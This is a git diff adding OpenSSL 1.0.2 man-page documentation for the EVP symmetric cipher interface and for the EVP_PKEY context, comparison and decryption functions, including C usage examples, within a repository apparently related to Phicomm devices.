+EVP_CipherInit_ex() and EVP_CipherUpdate() return 1 for success and 0 for failure.
+EVP_CipherFinal_ex() returns 0 for a decryption failure or 1 for success.
+
+EVP_CIPHER_CTX_cleanup() returns 1 for success and 0 for failure.
+
+EVP_get_cipherbyname(), EVP_get_cipherbynid() and EVP_get_cipherbyobj()
+return an B<EVP_CIPHER> structure or NULL on error.
+
+EVP_CIPHER_nid() and EVP_CIPHER_CTX_nid() return a NID.
+
+EVP_CIPHER_block_size() and EVP_CIPHER_CTX_block_size() return the block
+size.
+
+EVP_CIPHER_key_length() and EVP_CIPHER_CTX_key_length() return the key
+length.
+
+EVP_CIPHER_CTX_set_padding() always returns 1.
+
+EVP_CIPHER_iv_length() and EVP_CIPHER_CTX_iv_length() return the IV
+length or zero if the cipher does not use an IV.
+
+EVP_CIPHER_type() and EVP_CIPHER_CTX_type() return the NID of the cipher's
+OBJECT IDENTIFIER or NID_undef if it has no defined OBJECT IDENTIFIER.
+
+EVP_CIPHER_CTX_cipher() returns an B<EVP_CIPHER> structure.
+
+EVP_CIPHER_param_to_asn1() and EVP_CIPHER_asn1_to_param() return 1 for 
+success or zero for failure.
+
+=head1 CIPHER LISTING
+
+All algorithms have a fixed key length unless otherwise stated.
+
+=over 4
+
+=item EVP_enc_null()
+
+Null cipher: does nothing.
+
+=item EVP_des_cbc(void), EVP_des_ecb(void), EVP_des_cfb(void), EVP_des_ofb(void)
+
+DES in CBC, ECB, CFB and OFB modes respectively. 
+
+=item EVP_des_ede_cbc(void), EVP_des_ede(), EVP_des_ede_ofb(void),  EVP_des_ede_cfb(void)
+
+Two key triple DES in CBC, ECB, CFB and OFB modes respectively.
+
+=item EVP_des_ede3_cbc(void), EVP_des_ede3(), EVP_des_ede3_ofb(void),  EVP_des_ede3_cfb(void)
+
+Three key triple DES in CBC, ECB, CFB and OFB modes respectively.
+
+=item EVP_desx_cbc(void)
+
+DESX algorithm in CBC mode.
+
+=item EVP_rc4(void)
+
+RC4 stream cipher. This is a variable key length cipher with default key length 128 bits.
+
+=item EVP_rc4_40(void)
+
+RC4 stream cipher with 40 bit key length. This is obsolete and new code should use EVP_rc4()
+and the EVP_CIPHER_CTX_set_key_length() function.
+
+=item EVP_idea_cbc() EVP_idea_ecb(void), EVP_idea_cfb(void), EVP_idea_ofb(void), EVP_idea_cbc(void)
+
+IDEA encryption algorithm in CBC, ECB, CFB and OFB modes respectively.
+
+=item EVP_rc2_cbc(void), EVP_rc2_ecb(void), EVP_rc2_cfb(void), EVP_rc2_ofb(void)
+
+RC2 encryption algorithm in CBC, ECB, CFB and OFB modes respectively. This is a variable key
+length cipher with an additional parameter called "effective key bits" or "effective key length".
+By default both are set to 128 bits.
+
+=item EVP_rc2_40_cbc(void), EVP_rc2_64_cbc(void)
+
+RC2 algorithm in CBC mode with a default key length and effective key length of 40 and 64 bits.
+These are obsolete and new code should use EVP_rc2_cbc(), EVP_CIPHER_CTX_set_key_length() and
+EVP_CIPHER_CTX_ctrl() to set the key length and effective key length.
+
+=item EVP_bf_cbc(void), EVP_bf_ecb(void), EVP_bf_cfb(void), EVP_bf_ofb(void);
+
+Blowfish encryption algorithm in CBC, ECB, CFB and OFB modes respectively. This is a variable key
+length cipher.
+
+=item EVP_cast5_cbc(void), EVP_cast5_ecb(void), EVP_cast5_cfb(void), EVP_cast5_ofb(void)
+
+CAST encryption algorithm in CBC, ECB, CFB and OFB modes respectively. This is a variable key
+length cipher.
+
+=item EVP_rc5_32_12_16_cbc(void), EVP_rc5_32_12_16_ecb(void), EVP_rc5_32_12_16_cfb(void), EVP_rc5_32_12_16_ofb(void)
+
+RC5 encryption algorithm in CBC, ECB, CFB and OFB modes respectively. This is a variable key length
+cipher with an additional "number of rounds" parameter. By default the key length is set to 128
+bits and 12 rounds.
+
+=item EVP_aes_128_gcm(void), EVP_aes_192_gcm(void), EVP_aes_256_gcm(void)
+
+AES Galois Counter Mode (GCM) for 128, 192 and 256 bit keys respectively.
+These ciphers require additional control operations to function correctly: see
+L<GCM mode> section below for details.
+
+=item EVP_aes_128_ccm(void), EVP_aes_192_ccm(void), EVP_aes_256_ccm(void)
+
+AES Counter with CBC-MAC Mode (CCM) for 128, 192 and 256 bit keys respectively.
+These ciphers require additional control operations to function correctly: see
+CCM mode section below for details.
+
+=back
+
+=head1 GCM Mode
+
+For GCM mode ciphers the behaviour of the EVP interface is subtly altered and
+several GCM specific ctrl operations are supported.
+
+To specify any additional authenticated data (AAD) a call to EVP_CipherUpdate(),
+EVP_EncryptUpdate() or EVP_DecryptUpdate() should be made with the output 
+parameter B<out> set to B<NULL>.
+
+When decrypting the return value of EVP_DecryptFinal() or EVP_CipherFinal()
+indicates if the operation was successful. If it does not indicate success
+the authentication operation has failed and any output data B<MUST NOT>
+be used as it is corrupted.
+
+The following ctrls are supported in GCM mode:
+
+ EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_GCM_SET_IVLEN, ivlen, NULL);
+
+Sets the GCM IV length: this call can only be made before specifying an IV. If
+not called a default IV length is used (96 bits for AES).
+ 
+ EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_GCM_GET_TAG, taglen, tag);
+
+Writes B<taglen> bytes of the tag value to the buffer indicated by B<tag>.
+This call can only be made when encrypting data and B<after> all data has been
+processed (e.g. after an EVP_EncryptFinal() call).
+
+ EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_GCM_SET_TAG, taglen, tag);
+
+Sets the expected tag to B<taglen> bytes from B<tag>. This call is only legal
+when decrypting data and must be made B<before> any data is processed (e.g.
+before any EVP_DecryptUpdate() call). 
+
+See L<EXAMPLES> below for an example of the use of GCM mode.
+
+=head1 CCM Mode
+
+The behaviour of CCM mode ciphers is similar to CCM mode but with a few
+additional requirements and different ctrl values.
+
+Like GCM mode any additional authenticated data (AAD) is passed by calling
+EVP_CipherUpdate(), EVP_EncryptUpdate() or EVP_DecryptUpdate() with the output 
+parameter B<out> set to B<NULL>. Additionally the total plaintext or ciphertext
+length B<MUST> be passed to EVP_CipherUpdate(), EVP_EncryptUpdate() or
+EVP_DecryptUpdate() with the output and input parameters (B<in> and B<out>) 
+set to B<NULL> and the length passed in the B<inl> parameter.
+
+The following ctrls are supported in CCM mode:
+ 
+ EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_CCM_SET_TAG, taglen, tag);
+
+This call is made to set the expected B<CCM> tag value when decrypting or
+the length of the tag (with the B<tag> parameter set to NULL) when encrypting.
+The tag length is often referred to as B<M>. If not set a default value is
+used (12 for AES).
+
+ EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_CCM_SET_L, ivlen, NULL);
+
+Sets the CCM B<L> value. If not set a default is used (8 for AES).
+
+ EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_CCM_SET_IVLEN, ivlen, NULL);
+
+Sets the CCM nonce (IV) length: this call can only be made before specifying
+an nonce value. The nonce length is given by B<15 - L> so it is 7 by default
+for AES.
+
+
+
+=head1 NOTES
+
+Where possible the B<EVP> interface to symmetric ciphers should be used in
+preference to the low level interfaces. This is because the code then becomes
+transparent to the cipher used and much more flexible. Additionally, the
+B<EVP> interface will ensure the use of platform specific cryptographic
+acceleration such as AES-NI (the low level interfaces do not provide the
+guarantee).
+
+PKCS padding works by adding B<n> padding bytes of value B<n> to make the total 
+length of the encrypted data a multiple of the block size. Padding is always
+added so if the data is already a multiple of the block size B<n> will equal
+the block size. For example if the block size is 8 and 11 bytes are to be
+encrypted then 5 padding bytes of value 5 will be added.
+
+When decrypting the final block is checked to see if it has the correct form.
+
+Although the decryption operation can produce an error if padding is enabled,
+it is not a strong test that the input data or key is correct. A random block
+has better than 1 in 256 chance of being of the correct format and problems with
+the input data earlier on will not produce a final decrypt error.
+
+If padding is disabled then the decryption operation will always succeed if
+the total amount of data decrypted is a multiple of the block size.
+
+The functions EVP_EncryptInit(), EVP_EncryptFinal(), EVP_DecryptInit(),
+EVP_CipherInit() and EVP_CipherFinal() are obsolete but are retained for
+compatibility with existing code. New code should use EVP_EncryptInit_ex(),
+EVP_EncryptFinal_ex(), EVP_DecryptInit_ex(), EVP_DecryptFinal_ex(),
+EVP_CipherInit_ex() and EVP_CipherFinal_ex() because they can reuse an
+existing context without allocating and freeing it up on each call.
+
+=head1 BUGS
+
+For RC5 the number of rounds can currently only be set to 8, 12 or 16. This is
+a limitation of the current RC5 code rather than the EVP interface.
+
+EVP_MAX_KEY_LENGTH and EVP_MAX_IV_LENGTH only refer to the internal ciphers with
+default key lengths. If custom ciphers exceed these values the results are
+unpredictable. This is because it has become standard practice to define a 
+generic key as a fixed unsigned char array containing EVP_MAX_KEY_LENGTH bytes.
+
+The ASN1 code is incomplete (and sometimes inaccurate) it has only been tested
+for certain common S/MIME ciphers (RC2, DES, triple DES) in CBC mode.
+
+=head1 EXAMPLES
+
+Encrypt a string using IDEA:
+
+ int do_crypt(char *outfile)
+ 	{
+	unsigned char outbuf[1024];
+	int outlen, tmplen;
+	/* Bogus key and IV: we'd normally set these from
+	 * another source.
+	 */
+	unsigned char key[] = {0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15};
+	unsigned char iv[] = {1,2,3,4,5,6,7,8};
+	char intext[] = "Some Crypto Text";
+	EVP_CIPHER_CTX ctx;
+	FILE *out;
+
+	EVP_CIPHER_CTX_init(&ctx);
+	EVP_EncryptInit_ex(&ctx, EVP_idea_cbc(), NULL, key, iv);
+
+	if(!EVP_EncryptUpdate(&ctx, outbuf, &outlen, intext, strlen(intext)))
+		{
+		/* Error */
+		return 0;
+		}
+	/* Buffer passed to EVP_EncryptFinal() must be after data just
+	 * encrypted to avoid overwriting it.
+	 */
+	if(!EVP_EncryptFinal_ex(&ctx, outbuf + outlen, &tmplen))
+		{
+		/* Error */
+		return 0;
+		}
+	outlen += tmplen;
+	EVP_CIPHER_CTX_cleanup(&ctx);
+	/* Need binary mode for fopen because encrypted data is
+	 * binary data. Also cannot use strlen() on it because
+         * it wont be null terminated and may contain embedded
+	 * nulls.
+	 */
+	out = fopen(outfile, "wb");
+	fwrite(outbuf, 1, outlen, out);
+	fclose(out);
+	return 1;
+	}
+
+The ciphertext from the above example can be decrypted using the B<openssl>
+utility with the command line (shown on two lines for clarity):
+ 
+ openssl idea -d <filename
+          -K 000102030405060708090A0B0C0D0E0F -iv 0102030405060708
+
+General encryption and decryption function example using FILE I/O and AES128
+with a 128-bit key:
+
+ int do_crypt(FILE *in, FILE *out, int do_encrypt)
+ 	{
+	/* Allow enough space in output buffer for additional block */
+	unsigned char inbuf[1024], outbuf[1024 + EVP_MAX_BLOCK_LENGTH];
+	int inlen, outlen;
+	EVP_CIPHER_CTX ctx;
+	/* Bogus key and IV: we'd normally set these from
+	 * another source.
+	 */
+	unsigned char key[] = "0123456789abcdeF";
+	unsigned char iv[] = "1234567887654321";
+
+	/* Don't set key or IV right away; we want to check lengths */
+	EVP_CIPHER_CTX_init(&ctx);
+	EVP_CipherInit_ex(&ctx, EVP_aes_128_cbc(), NULL, NULL, NULL,
+		do_encrypt);
+	OPENSSL_assert(EVP_CIPHER_CTX_key_length(&ctx) == 16);
+	OPENSSL_assert(EVP_CIPHER_CTX_iv_length(&ctx) == 16);
+
+	/* Now we can set key and IV */
+	EVP_CipherInit_ex(&ctx, NULL, NULL, key, iv, do_encrypt);
+
+	for(;;) 
+		{
+		inlen = fread(inbuf, 1, 1024, in);
+		if(inlen <= 0) break;
+		if(!EVP_CipherUpdate(&ctx, outbuf, &outlen, inbuf, inlen))
+			{
+			/* Error */
+			EVP_CIPHER_CTX_cleanup(&ctx);
+			return 0;
+			}
+		fwrite(outbuf, 1, outlen, out);
+		}
+	if(!EVP_CipherFinal_ex(&ctx, outbuf, &outlen))
+		{
+		/* Error */
+		EVP_CIPHER_CTX_cleanup(&ctx);
+		return 0;
+		}
+	fwrite(outbuf, 1, outlen, out);
+
+	EVP_CIPHER_CTX_cleanup(&ctx);
+	return 1;
+	}
+
+
+=head1 SEE ALSO
+
+L<evp(3)|evp(3)>
+
+=head1 HISTORY
+
+EVP_CIPHER_CTX_init(), EVP_EncryptInit_ex(), EVP_EncryptFinal_ex(),
+EVP_DecryptInit_ex(), EVP_DecryptFinal_ex(), EVP_CipherInit_ex(),
+EVP_CipherFinal_ex() and EVP_CIPHER_CTX_set_padding() appeared in
+OpenSSL 0.9.7.
+
+IDEA appeared in OpenSSL 0.9.7 but was often disabled due to
+patent concerns; the last patents expired in 2012.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_OpenInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_OpenInit.pod
new file mode 100644
index 0000000..2e710da
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_OpenInit.pod
@@ -0,0 +1,63 @@
+=pod
+
+=head1 NAME
+
+EVP_OpenInit, EVP_OpenUpdate, EVP_OpenFinal - EVP envelope decryption
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_OpenInit(EVP_CIPHER_CTX *ctx,EVP_CIPHER *type,unsigned char *ek,
+		int ekl,unsigned char *iv,EVP_PKEY *priv);
+ int EVP_OpenUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl, unsigned char *in, int inl);
+ int EVP_OpenFinal(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl);
+
+=head1 DESCRIPTION
+
+The EVP envelope routines are a high level interface to envelope
+decryption. They decrypt a public key encrypted symmetric key and
+then decrypt data using it.
+
+EVP_OpenInit() initializes a cipher context B<ctx> for decryption
+with cipher B<type>. It decrypts the encrypted symmetric key of length
+B<ekl> bytes passed in the B<ek> parameter using the private key B<priv>.
+The IV is supplied in the B<iv> parameter.
+
+EVP_OpenUpdate() and EVP_OpenFinal() have exactly the same properties
+as the EVP_DecryptUpdate() and EVP_DecryptFinal() routines, as 
+documented on the L<EVP_EncryptInit(3)|EVP_EncryptInit(3)> manual
+page.
+
+=head1 NOTES
+
+It is possible to call EVP_OpenInit() twice in the same way as
+EVP_DecryptInit(). The first call should have B<priv> set to NULL
+and (after setting any cipher parameters) it should be called again
+with B<type> set to NULL.
+
+If the cipher passed in the B<type> parameter is a variable length
+cipher then the key length will be set to the value of the recovered
+key length. If the cipher is a fixed length cipher then the recovered
+key length must match the fixed cipher length.
+
+=head1 RETURN VALUES
+
+EVP_OpenInit() returns 0 on error or a non zero integer (actually the
+recovered secret key size) if successful.
+
+EVP_OpenUpdate() returns 1 for success or 0 for failure.
+
+EVP_OpenFinal() returns 0 if the decrypt failed or 1 for success.
+
+=head1 SEE ALSO
+
+L<evp(3)|evp(3)>, L<rand(3)|rand(3)>,
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)>,
+L<EVP_SealInit(3)|EVP_SealInit(3)>
+
+=head1 HISTORY
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_CTX_ctrl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_CTX_ctrl.pod
new file mode 100644
index 0000000..44b5fdb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_CTX_ctrl.pod
@@ -0,0 +1,134 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_CTX_ctrl, EVP_PKEY_CTX_ctrl_str, EVP_PKEY_get_default_digest_nid,
+EVP_PKEY_CTX_set_signature_md, EVP_PKEY_CTX_set_rsa_padding,
+EVP_PKEY_CTX_set_rsa_pss_saltlen, EVP_PKEY_CTX_set_rsa_rsa_keygen_bits,
+EVP_PKEY_CTX_set_rsa_keygen_pubexp, EVP_PKEY_CTX_set_dsa_paramgen_bits,
+EVP_PKEY_CTX_set_dh_paramgen_prime_len,
+EVP_PKEY_CTX_set_dh_paramgen_generator,
+EVP_PKEY_CTX_set_ec_paramgen_curve_nid - algorithm specific control operations
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_CTX_ctrl(EVP_PKEY_CTX *ctx, int keytype, int optype,
+				int cmd, int p1, void *p2);
+ int EVP_PKEY_CTX_ctrl_str(EVP_PKEY_CTX *ctx, const char *type,
+						const char *value);
+
+ int EVP_PKEY_get_default_digest_nid(EVP_PKEY *pkey, int *pnid);
+
+ #include <openssl/rsa.h>
+
+ int EVP_PKEY_CTX_set_signature_md(EVP_PKEY_CTX *ctx, const EVP_MD *md);
+
+ int EVP_PKEY_CTX_set_rsa_padding(EVP_PKEY_CTX *ctx, int pad);
+ int EVP_PKEY_CTX_set_rsa_pss_saltlen(EVP_PKEY_CTX *ctx, int len);
+ int EVP_PKEY_CTX_set_rsa_rsa_keygen_bits(EVP_PKEY_CTX *ctx, int mbits);
+ int EVP_PKEY_CTX_set_rsa_keygen_pubexp(EVP_PKEY_CTX *ctx, BIGNUM *pubexp);
+
+ #include <openssl/dsa.h>
+ int EVP_PKEY_CTX_set_dsa_paramgen_bits(EVP_PKEY_CTX *ctx, int nbits);
+
+ #include <openssl/dh.h>
+ int EVP_PKEY_CTX_set_dh_paramgen_prime_len(EVP_PKEY_CTX *ctx, int len);
+ int EVP_PKEY_CTX_set_dh_paramgen_generator(EVP_PKEY_CTX *ctx, int gen);
+
+ #include <openssl/ec.h>
+ int EVP_PKEY_CTX_set_ec_paramgen_curve_nid(EVP_PKEY_CTX *ctx, int nid);
+
+=head1 DESCRIPTION
+
+The function EVP_PKEY_CTX_ctrl() sends a control operation to the context
+B<ctx>. The key type used must match B<keytype> if it is not -1. The parameter
+B<optype> is a mask indicating which operations the control can be applied to.
+The control command is indicated in B<cmd> and any additional arguments in
+B<p1> and B<p2>.
+
+Applications will not normally call EVP_PKEY_CTX_ctrl() directly but will
+instead call one of the algorithm specific macros below.
+
+The function EVP_PKEY_CTX_ctrl_str() allows an application to send an algorithm
+specific control operation to a context B<ctx> in string form. This is
+intended to be used for options specified on the command line or in text
+files. The commands supported are documented in the openssl utility
+command line pages for the option B<-pkeyopt> which is supported by the
+B<pkeyutl>, B<genpkey> and B<req> commands.
+
+All the remaining "functions" are implemented as macros.
+
+The EVP_PKEY_CTX_set_signature_md() macro sets the message digest type used
+in a signature. It can be used with any public key algorithm supporting
+signature operations.
+
+The macro EVP_PKEY_CTX_set_rsa_padding() sets the RSA padding mode for B<ctx>.
+The B<pad> parameter can take the value RSA_PKCS1_PADDING for PKCS#1 padding,
+RSA_SSLV23_PADDING for SSLv23 padding, RSA_NO_PADDING for no padding,
+RSA_PKCS1_OAEP_PADDING for OAEP padding (encrypt and decrypt only),
+RSA_X931_PADDING for X9.31 padding (signature operations only) and 
+RSA_PKCS1_PSS_PADDING (sign and verify only).
+
+Two RSA padding modes behave differently if EVP_PKEY_CTX_set_signature_md()
+is used. If this macro is called for PKCS#1 padding the plaintext buffer is
+an actual digest value and is encapsulated in a DigestInfo structure according
+to PKCS#1 when signing and this structure is expected (and stripped off) when
+verifying. If this control is not used with RSA and PKCS#1 padding then the
+supplied data is used directly and not encapsulated. In the case of X9.31
+padding for RSA the algorithm identifier byte is added or checked and removed
+if this control is called. If it is not called then the first byte of the plaintext buffer is expected to be the algorithm identifier byte.
+
+The EVP_PKEY_CTX_set_rsa_pss_saltlen() macro sets the RSA PSS salt length to
+B<len> as its name implies it is only supported for PSS padding.  Two special
+values are supported: -1 sets the salt length to the digest length. When
+signing -2 sets the salt length to the maximum permissible value. When
+verifying -2 causes the salt length to be automatically determined based on the
+B<PSS> block structure. If this macro is not called a salt length value of -2
+is used by default.
+
+The EVP_PKEY_CTX_set_rsa_rsa_keygen_bits() macro sets the RSA key length for
+RSA key genration to B<bits>. If not specified 1024 bits is used.
+
+The EVP_PKEY_CTX_set_rsa_keygen_pubexp() macro sets the public exponent value
+for RSA key generation to B<pubexp> currently it should be an odd integer. The
+B<pubexp> pointer is used internally by this function so it should not be 
+modified or free after the call. If this macro is not called then 65537 is used.
+
+The macro EVP_PKEY_CTX_set_dsa_paramgen_bits() sets the number of bits used
+for DSA parameter generation to B<bits>. If not specified 1024 is used.
+
+The macro EVP_PKEY_CTX_set_dh_paramgen_prime_len() sets the length of the DH
+prime parameter B<p> for DH parameter generation. If this macro is not called
+then 1024 is used.
+
+The EVP_PKEY_CTX_set_dh_paramgen_generator() macro sets DH generator to B<gen>
+for DH parameter generation. If not specified 2 is used.
+
+The EVP_PKEY_CTX_set_ec_paramgen_curve_nid() sets the EC curve for EC parameter
+generation to B<nid>. For EC parameter generation this macro must be called
+or an error occurs because there is no default curve.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_CTX_ctrl() and its macros return a positive value for success and 0
+or a negative value for failure. In particular a return value of -2
+indicates the operation is not supported by the public key algorithm.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+L<EVP_PKEY_keygen(3)|EVP_PKEY_keygen(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_CTX_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_CTX_new.pod
new file mode 100644
index 0000000..a9af867
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_CTX_new.pod
@@ -0,0 +1,52 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_CTX_new, EVP_PKEY_CTX_new_id, EVP_PKEY_CTX_dup, EVP_PKEY_CTX_free - public key algorithm context functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ EVP_PKEY_CTX *EVP_PKEY_CTX_new(EVP_PKEY *pkey, ENGINE *e);
+ EVP_PKEY_CTX *EVP_PKEY_CTX_new_id(int id, ENGINE *e);
+ EVP_PKEY_CTX *EVP_PKEY_CTX_dup(EVP_PKEY_CTX *ctx);
+ void EVP_PKEY_CTX_free(EVP_PKEY_CTX *ctx);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_CTX_new() function allocates public key algorithm context using
+the algorithm specified in B<pkey> and ENGINE B<e>.
+
+The EVP_PKEY_CTX_new_id() function allocates public key algorithm context
+using the algorithm specified by B<id> and ENGINE B<e>. It is normally used
+when no B<EVP_PKEY> structure is associated with the operations, for example
+during parameter generation of key genration for some algorithms.
+
+EVP_PKEY_CTX_dup() duplicates the context B<ctx>.
+
+EVP_PKEY_CTX_free() frees up the context B<ctx>.
+
+=head1 NOTES
+
+The B<EVP_PKEY_CTX> structure is an opaque public key algorithm context used
+by the OpenSSL high level public key API. Contexts B<MUST NOT> be shared between
+threads: that is it is not permissible to use the same context simultaneously
+in two threads.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_CTX_new(), EVP_PKEY_CTX_new_id(), EVP_PKEY_CTX_dup() returns either
+the newly allocated B<EVP_PKEY_CTX> structure of B<NULL> if an error occurred.
+
+EVP_PKEY_CTX_free() does not return a value.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_new(3)|EVP_PKEY_new(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_cmp.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_cmp.pod
new file mode 100644
index 0000000..0ff027c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_cmp.pod
@@ -0,0 +1,61 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_copy_parameters, EVP_PKEY_missing_parameters, EVP_PKEY_cmp_parameters, EVP_PKEY_cmp - public key parameter and comparison functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_missing_parameters(const EVP_PKEY *pkey);
+ int EVP_PKEY_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from);
+
+ int EVP_PKEY_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b);
+ int EVP_PKEY_cmp(const EVP_PKEY *a, const EVP_PKEY *b);
+
+=head1 DESCRIPTION
+
+The function EVP_PKEY_missing_parameters() returns 1 if the public key
+parameters of B<pkey> are missing and 0 if they are present or the algorithm
+doesn't use parameters.
+
+The function EVP_PKEY_copy_parameters() copies the parameters from key
+B<from> to key B<to>.
+
+The function EVP_PKEY_cmp_parameters() compares the parameters of keys
+B<a> and B<b>.
+
+The function EVP_PKEY_cmp() compares the public key components and paramters
+(if present) of keys B<a> and B<b>.
+
+=head1 NOTES
+
+The main purpose of the functions EVP_PKEY_missing_parameters() and
+EVP_PKEY_copy_parameters() is to handle public keys in certificates where the
+parameters are sometimes omitted from a public key if they are inherited from
+the CA that signed it.
+
+Since OpenSSL private keys contain public key components too the function
+EVP_PKEY_cmp() can also be used to determine if a private key matches
+a public key.
+
+=head1 RETURN VALUES
+
+The function EVP_PKEY_missing_parameters() returns 1 if the public key
+parameters of B<pkey> are missing and 0 if they are present or the algorithm
+doesn't use parameters.
+
+These functions EVP_PKEY_copy_parameters() returns 1 for success and 0 for
+failure.
+
+The function EVP_PKEY_cmp_parameters() and EVP_PKEY_cmp() return 1 if the
+keys match, 0 if they don't match, -1 if the key types are different and
+-2 if the operation is not supported.
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_keygen(3)|EVP_PKEY_keygen(3)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_decrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_decrypt.pod
new file mode 100644
index 0000000..8479832
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_decrypt.pod
@@ -0,0 +1,93 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_decrypt_init, EVP_PKEY_decrypt - decrypt using a public key algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_decrypt_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_decrypt(EVP_PKEY_CTX *ctx,
+			unsigned char *out, size_t *outlen,
+			const unsigned char *in, size_t inlen);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_decrypt_init() function initializes a public key algorithm
+context using key B<pkey> for a decryption operation.
+
+The EVP_PKEY_decrypt() function performs a public key decryption operation
+using B<ctx>. The data to be decrypted is specified using the B<in> and
+B<inlen> parameters. If B<out> is B<NULL> then the maximum size of the output
+buffer is written to the B<outlen> parameter. If B<out> is not B<NULL> then
+before the call the B<outlen> parameter should contain the length of the
+B<out> buffer, if the call is successful the decrypted data is written to
+B<out> and the amount of data written to B<outlen>.
+
+=head1 NOTES
+
+After the call to EVP_PKEY_decrypt_init() algorithm specific control
+operations can be performed to set any appropriate parameters for the
+operation.
+
+The function EVP_PKEY_decrypt() can be called more than once on the same
+context if several operations are performed using the same parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_decrypt_init() and EVP_PKEY_decrypt() return 1 for success and 0
+or a negative value for failure. In particular a return value of -2
+indicates the operation is not supported by the public key algorithm.
+
+=head1 EXAMPLE
+
+Decrypt data using OAEP (for RSA keys):
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ unsigned char *out, *in;
+ size_t outlen, inlen; 
+ EVP_PKEY *key;
+ /* NB: assumes key in, inlen are already set up
+  * and that key is an RSA private key
+  */
+ ctx = EVP_PKEY_CTX_new(key);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_decrypt_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_rsa_padding(ctx, RSA_OAEP_PADDING) <= 0)
+	/* Error */
+
+ /* Determine buffer length */
+ if (EVP_PKEY_decrypt(ctx, NULL, &outlen, in, inlen) <= 0)
+	/* Error */
+
+ out = OPENSSL_malloc(outlen);
+
+ if (!out)
+	/* malloc failure */
+ 
+ if (EVP_PKEY_decrypt(ctx, out, &outlen, in, inlen) <= 0)
+	/* Error */
+
+ /* Decrypted data is outlen bytes written to buffer out */
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
